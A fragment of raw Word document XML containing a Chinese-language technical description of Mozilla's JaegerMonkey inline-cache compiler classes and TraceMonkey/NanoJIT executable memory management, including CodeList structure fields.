        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>methodjit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>目录中找到。了解</w:t>
      </w:r>
      <w:r>
        <w:t>一些关键类对于理解嵌入式缓存的工作原理至关重要</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79726054" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E663B0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="666"/>
        </w:tabs>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:right="553" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PICStubCompiler-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>从B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>aseCompiler继承。其他PIC类继承自PICStubCompiler，并使用其初始化BaseCompiler类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288B2371" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="666"/>
        </w:tabs>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:right="548" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SetPropCompiler-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>生成本机代码并调用存根以设置对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>象属性的类</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CDB6AFB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="666"/>
        </w:tabs>
        <w:spacing w:before="19" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="507" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>GetPropCompiler-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>生成本地代码并调用存根以获取对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>象属性的类</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08A42396" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="666"/>
        </w:tabs>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:right="895" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ScopeNameCompiler-生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用于执行名称查找（例如函数或变量名称）的本机代码的类</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1BF5E379" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="666"/>
        </w:tabs>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:right="1095" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BindNameCompiler-生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用于执行名称分配的本机代码的类</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4324525A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637825C7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="134E3064" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_bookmark3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TraceMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39A331CA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="35"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B9D478" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="401"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TraceMonkey是使用Mozilla的SpiderMonkey构建的跟踪引擎</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。 TraceMonkey使用跟踪监视器jstracer来监视和解释SpiderMonkey字节码。每当看到可从本机编译中受益的代码时，就会激活其记录器。记录器记录IR</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>的执行并创建NanoJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LIR（低级中间表示</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>），</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>然后将其编译为本机代码</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这些本机代码块在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NanoJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">中称为片段。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NanoJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以生成高度优化的代码，因此不需要内联缓存或即时重写本机代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818E161" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8AFB49" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="415"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">就像JaegerMonkey中的Nitro一样，后端NanoJIT引擎负责可执行JIT页面的内存管理。这是通过CodeAlloc类接口完成的。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CodeAlloc类使用CodeList类来跟踪各个代码块</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>每个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NanoJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>页面都是使用RWX（读写执行）权限创建的，并包含一些元数据。此元数据在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>odeList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类中描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>述。此类具有几个相关的成员值：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D71070" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509E6843" w14:textId="20AB6C22" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3039"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>CodeList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>* nex</w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>指向下一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>CodeList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6812A86E" w14:textId="0EFB9366" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3039"/>
        </w:tabs>
        <w:spacing w:before="38"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>CodeList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>lower</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>指向上一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>CodeList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6069B8EE" w14:textId="77777777" w:rsidR="001C7552" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3039"/>
        </w:tabs>
        <w:spacing w:before="19" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="1042"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>CodeList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>teriminator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>指向保存此特定列表的</w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>_chunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">_ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED478DA" w14:textId="3A93A055" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3039"/>
        </w:tabs>
        <w:spacing w:before="19" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="1042"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">bool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>isFree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>如果此块空闲则为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D0476" w14:textId="52E87314" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3039"/>
        </w:tabs>
        <w:spacing w:before="21"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>bool</w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>isExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如果此块是可执行的，则为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6210DE5C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2F51CE" w14:textId="7823AB63" w:rsidR="0026102A" w:rsidRDefault="001C7552">
      <w:pPr>
        <w:spacing w:before="86"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">nion </w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E621244" w14:textId="2ADB8A3B" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3039"/>
        </w:tabs>
        <w:spacing w:before="19"/>
        <w:ind w:left="544"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CodeList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>higher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>指向下一个块</w:t>
      </w:r>
    </w:p>
